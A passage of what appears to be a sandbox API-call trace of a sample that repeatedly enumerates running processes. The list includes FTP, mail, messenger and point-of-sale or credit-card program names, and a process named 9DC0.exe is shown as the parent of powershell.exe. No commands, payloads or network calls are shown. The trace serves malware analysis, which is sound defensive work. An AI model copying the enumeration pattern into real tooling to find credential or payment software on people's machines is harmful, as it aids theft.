th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0257.456] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0257.458] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0257.460] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0257.462] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0257.464] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0257.469] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0257.471] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0257.473] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0257.475] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0257.477] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0257.525] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0257.527] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0257.529] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0257.531] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0257.533] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0257.535] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0257.537] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0257.538] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0257.543] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0257.545] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0257.547] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0257.549] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0257.551] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0257.552] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0257.554] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0257.556] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0257.558] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0257.560] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0257.562] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0257.602] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0257.604] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0257.605] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0257.607] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0257.609] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0257.610] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0257.612] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0257.614] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0257.616] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0257.617] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0257.619] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0257.621] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0257.622] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0257.624] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0257.628] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0257.630] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0257.631] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0257.633] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0257.634] CloseHandle (hObject=0x2338) returned 1 [0257.634] Sleep (dwMilliseconds=0x64) [0257.671] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0257.720] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.722] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0257.723] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0257.725] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.727] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0257.728] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.730] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0257.731] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0257.733] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0257.734] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.736] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.738] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0257.739] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.741] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.742] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.744] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.745] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.747] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.787] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.789] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.790] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0257.792] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.794] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0257.795] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.797] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0257.798] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0257.800] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0257.802] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0257.804] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0257.805] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0257.806] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.808] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.809] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0257.811] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.812] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0257.814] 